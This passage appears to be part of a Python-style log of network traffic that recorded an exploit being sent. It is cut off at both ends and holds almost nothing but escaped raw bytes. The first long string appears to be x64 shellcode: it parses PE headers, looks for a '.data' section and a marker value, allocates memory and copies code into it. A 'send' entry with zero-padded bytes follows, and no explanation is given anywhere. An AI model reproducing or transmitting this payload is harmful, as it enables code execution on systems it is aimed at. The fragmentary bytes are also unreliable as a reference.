\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x